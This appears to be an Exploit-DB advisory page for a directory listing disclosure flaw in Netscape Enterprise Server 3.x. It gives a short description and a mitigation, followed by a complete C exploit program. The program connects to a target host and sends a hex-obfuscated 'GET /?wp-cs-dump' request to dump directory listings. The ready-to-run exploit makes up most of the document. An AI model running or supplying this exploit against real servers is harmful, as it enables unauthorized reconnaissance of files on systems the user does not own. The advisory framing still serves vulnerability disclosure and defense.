Netscape Enterprise Server 3.x Directory Indexing Vulnerability

vendor:

Enterprise Server

by:

Gabriel Maggiotti

7.5

CVSS

HIGH

Directory Indexing Vulnerability

539

CWE

Product Name: Enterprise Server

Affected Version From: 3.x

Affected Version To: 3.x

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2002

Netscape Enterprise Server 3.x Directory Indexing Vulnerability

Netscape Enterprise Server 3.x includes a poorly documented feature that will allow remote users to view directory listings by appending various instructional tags to the URL. Although it can be disabled, Netscape Enterprise Server is shipped with the 'Directory Indexing' feature enabled by default.

Mitigation:

Disable the 'Directory Indexing' feature

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/1063/info

Netscape Enterprise Server 3.x includes a poorly documented feature that will allow remote users to view directory listings by appending various instructional tags to the URL. Although it can be disabled, Netscape Enterprise Server is shipped with the "Directory Indexing" feature enabled by default. 

/*
 *	Server:Netscape-Enterprise
 *	This exploit is about Trasversal Vuln.
 *
 *	Written by Gabriel Maggiotti
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define SEND	10000
#define RECIVE	100000


char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[SEND]="";
char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

/***************************************************************************/

int main(int argc,char *argv[])
{
int sockfd, numbytes;
char recv_buf[RECIVE];
int port;

char inject[SEND]=
	"\x47\x45\x54\x20\x2f\x3f\x77\x70\x2d\x63\x73\x2d"
	"\x64\x75\x6d\x70\x20\x48\x54\x54\x50\x2f\x31\x2e"
	"\x30\xa\xa";


struct hostent *he;

struct sockaddr_in their_addr;


if(argc!=3)
{
	fprintf(stderr,"usage:%s <hostname> <port>\n",argv[0]);
	exit(1);
}


if((he=gethostbyname(argv[1]))==NULL)
{
	perror("gethostbyname");
	exit(1);
}

port=atoi(argv[2]);



if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
	perror("socket");
	exit(1);
}


their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(port);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);



if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
{
	perror("connect");
	exit(1);
}

if(send(sockfd,inject,SEND,0) ==-1)
{
	perror("send");
	exit(0);
}

if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1)
{
	perror("recv");
	exit(1);
}

recv_buf[numbytes]='\0';
printf("%s\n",recv_buf);




close(sockfd);

return 0;
}